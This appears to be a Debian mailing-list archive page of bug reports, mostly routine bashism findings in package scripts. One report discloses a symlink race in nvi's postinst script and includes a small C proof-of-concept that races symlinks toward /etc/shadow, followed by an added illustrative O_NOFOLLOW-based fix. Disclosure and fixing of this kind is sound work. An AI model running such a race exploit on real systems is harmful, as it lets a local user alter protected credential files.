Bug#772234: graphviz: bashism in /bin/sh script
Package: graphviz
Severity: important
Version: 2.38.0-6
User: debian-rele...@lists.debian.org
Usertags: goal-dash

Hi,

I've run checkbashisms (from the 'devscripts' package) over the whole archive and I found that your package has a /bin/sh script that uses a "bashism".

checkbashisms' output:
> possible bashism in ./usr/bin/gvmap.sh line 67 (alternative test command
> ([[ foo ]] should be [ foo ])):
> if [[ "$OPTARG" == '?' ]]
> possible bashism in ./usr/bin/gvmap.sh line 67 (should be 'b = a'):
> if [[ "$OPTARG" == '?' ]]
> possible bashism in ./usr/bin/gvmap.sh line 79 (alternative test command
> ([[ foo ]] should be [ foo ])):
> if [[ $# == 0 ]]
> possible bashism in ./usr/bin/gvmap.sh line 79 (should be 'b = a'):
> if [[ $# == 0 ]]
> possible bashism in ./usr/bin/gvmap.sh line 81 (alternative test command
> ([[ foo ]] should be [ foo ])):
> if [[ -n $VERBOSE ]]
> possible bashism in ./usr/bin/gvmap.sh line 87 ('((' should be '$(('):
> while (( $# > 0 ))
> possible bashism in ./usr/bin/gvmap.sh line 89 (alternative test command
> ([[ foo ]] should be [ foo ])):
> if [[ -f $1 ]]
> possible bashism in ./usr/bin/gvmap.sh line 91 (alternative test command
> ([[ foo ]] should be [ foo ])):
> if [[ -n $VERBOSE ]]

Not using bash (or a Debian Policy compliant shell interpreter that doesn't provide such an extra feature) as /bin/sh is likely to lead to errors or unexpected behaviours. Please be aware that dash is the default /bin/sh.

Please closely examine the above output and the script, and determine what the proper severity of the bug is, and adjust it accordingly. If it's important or greater please hurry to get this fixed for jessie.

Hints about how to fix bashisms can be found at:
https://wiki.ubuntu.com/DashAsBinSh

Thanks in advance,
Raphael Geissert

--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/2554460.2By0TpSjE0@eee
Bug#772259: dump: bashism in /bin/sh script
Package: dump
Severity: minor
Version: 0.4b44-5
User: debian-rele...@lists.debian.org
Usertags: goal-dash

Hi,

I've run checkbashisms (from the 'devscripts' package) over the whole archive and I found that your package has a /bin/sh script that uses a "bashism".

checkbashisms' output:
> possible bashism in ./usr/share/doc/dump/examples/dump_on_cd_3/dump_disk
> line 47 (trap with ERR|DEBUG|RETURN):
> trap error_exit ERR

Not using bash (or a Debian Policy compliant shell interpreter that doesn't provide such an extra feature) as /bin/sh is likely to lead to errors or unexpected behaviours. Please be aware that dash is the default /bin/sh.

Please closely examine the above output and the script, and determine what the proper severity of the bug is, and adjust it accordingly. If it's important or greater please hurry to get this fixed for jessie.

Hints about how to fix bashisms can be found at:
https://wiki.ubuntu.com/DashAsBinSh

Thanks in advance,
Raphael Geissert

Archive: https://lists.debian.org/4794428.ztbkcPe1SP@eee
Bug#772363: sendmail-base: bashism in /bin/sh script
Package: sendmail-base
Severity: normal
Version: 8.14.4-8
User: debian-rele...@lists.debian.org
Usertags: goal-dash

Hi,

I've run checkbashisms (from the 'devscripts' package) over the whole archive and I found that your package has a /bin/sh script that uses a "bashism".

checkbashisms' output:
> possible bashism in ./usr/share/sendmail/dynamic line 342 (sleep only takes
> one integer):
> sleep 1s;

Not using bash (or a Debian Policy compliant shell interpreter that doesn't provide such an extra feature) as /bin/sh is likely to lead to errors or unexpected behaviours. Please be aware that dash is the default /bin/sh.

Please closely examine the above output and the script, and determine what the proper severity of the bug is, and adjust it accordingly. If it's important or greater please hurry to get this fixed for jessie.

Hints about how to fix bashisms can be found at:
https://wiki.ubuntu.com/DashAsBinSh

Thanks in advance,
Raphael Geissert

Archive: https://lists.debian.org/2254933.T9YkZYOqlq@eee
Bug#771375: nvi: insecure use of /var/tmp
* Jakub Wilk, 2014-11-28, 23:19:
nvi does this in postinst:

    if [[ -L /var/tmp/vi.recover || \
          -e /var/tmp/vi.recover && ! -d /var/tmp/vi.recover ]]; then
        echo "Cannot create recovery directory /var/tmp/vi.recover" 1>&2
        exit 1
    fi
    [ -d /var/tmp/vi.recover ] || mkdir -p /var/tmp/vi.recover
    chown root:root /var/tmp/vi.recover
    chmod 1777 /var/tmp/vi.recover

This is racy. If there is no symlink protection enabled (/proc/sys/fs/protected_symlinks), a malicious local user could trick this code into chmodding arbitrary files.

PoC exploit is attached. On a test machine I was able to get /etc/shadow pwned with probability ~0.1%.

--
Jakub Wilk

    #include <sys/stat.h>
    #include <unistd.h>

    int main(int argc, char **argv)
    {
        const char *f = "/var/tmp/vi.recover";
        while (1) {
            symlink("/etc/shadow", f);
            unlink(f);
            mkdir(f, 0777);
            rmdir(f);
        }
    }
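Added example, not part of the original report and not nvi's actual fix: one way to close the check-then-chmod race described above is to stop using the path name once the directory has been opened. The helper make_dir_nofollow(), the demo() scenario and its temporary paths are hypothetical names constructed for illustration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper, not nvi's code: make `path` a directory owned by
 * uid:gid with `mode`, refusing a symlink at `path`. 0 on success, -1 on error. */
int make_dir_nofollow(const char *path, uid_t uid, gid_t gid, mode_t mode)
{
    /* mkdir() never follows a final-component symlink; EEXIST is vetted below. */
    if (mkdir(path, 0700) != 0 && errno != EEXIST)
        return -1;
    /* O_NOFOLLOW refuses a symlink, O_DIRECTORY refuses a non-directory. */
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    /* Act on the descriptor: swapping what `path` names can no longer
     * redirect the ownership or mode change. */
    int rc = (fchown(fd, uid, gid) == 0 && fchmod(fd, mode) == 0) ? 0 : -1;
    close(fd);
    return rc;
}

/* Constructed scenario: "lnk" is a symlink to a 0600 decoy file, "fresh" does
 * not exist. Returns 0 if lnk is refused, decoy is untouched, fresh is 1777. */
int demo(void)
{
    char base[] = "/tmp/nofollow.XXXXXX", decoy[64], lnk[64], fresh[64];
    struct stat st;
    if (!mkdtemp(base))
        return -1;
    snprintf(decoy, sizeof decoy, "%s/decoy", base);
    snprintf(lnk, sizeof lnk, "%s/lnk", base);
    snprintf(fresh, sizeof fresh, "%s/fresh", base);
    int fd = open(decoy, O_CREAT | O_WRONLY, 0600);
    if (fd < 0 || fchmod(fd, 0600) || close(fd) || symlink(decoy, lnk))
        return -1;
    int refused = make_dir_nofollow(lnk, getuid(), getgid(), 01777) == -1;
    int intact = stat(decoy, &st) == 0 && (st.st_mode & 07777) == 0600;
    int made = make_dir_nofollow(fresh, getuid(), getgid(), 01777) == 0 &&
               lstat(fresh, &st) == 0 && S_ISDIR(st.st_mode) &&
               (st.st_mode & 07777) == 01777;
    unlink(lnk); unlink(decoy); rmdir(fresh); rmdir(base); /* clean up */
    return (refused && intact && made) ? 0 : 1;
}

int main(void) { return demo(); }
```

A maintainer script would call the helper with uid 0, gid 0 and mode 01777 on the recovery directory.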
Bug#772353: pdnsd: bashism in /bin/sh script
Package: pdnsd
Severity: important
Version: 1.2.9a-par-2
User: debian-rele...@lists.debian.org
Usertags: goal-dash

Hi,

I've run checkbashisms (from the 'devscripts' package) over the whole archive and I found that your package has a /bin/sh script that uses a "bashism".

checkbashisms' output:
> possible bashism in ./etc/init.d/pdnsd line 64 (sleep only takes one
> integer):
> sleep 0.1

Not using bash (or a Debian Policy compliant shell interpreter that doesn't provide such an extra feature) as /bin/sh is likely to lead to errors or unexpected behaviours. Please be aware that dash is the default /bin/sh.

Please closely examine the above output and the script, and determine what the proper severity of the bug is, and adjust it accordingly. If it's important or greater please hurry to get this fixed for jessie.

Hints about how to fix bashisms can be found at:
https://wiki.ubuntu.com/DashAsBinSh

Thanks in advance,
Raphael Geissert

Archive: https://lists.debian.org/1538835.KmDLzbQ4Ak@eee
Bug#772383: ulatencyd: bashism in /bin/sh script
Package: ulatencyd
Severity: minor
Version: 0.5.0-9
User: debian-rele...@lists.debian.org
Usertags: goal-dash

Hi,

I've run checkbashisms (from the 'devscripts' package) over the whole archive and I found that your package has a /bin/sh script that uses a "bashism".

checkbashisms' output:
> possible bashism in ./etc/init.d/ulatencyd line 94 (sleep only takes one
> integer):
> sleep 0.2

Not using bash (or a Debian Policy compliant shell interpreter that doesn't provide such an extra feature) as /bin/sh is likely to lead to errors or unexpected behaviours. Please be aware that dash is the default /bin/sh.

Please closely examine the above output and the script, and determine what the proper severity of the bug is, and adjust it accordingly. If it's important or greater please hurry to get this fixed for jessie.

Hints about how to fix bashisms can be found at:
https://wiki.ubuntu.com/DashAsBinSh

Thanks in advance,
Raphael Geissert

Archive: https://lists.debian.org/4449086.frMLg6A149@eee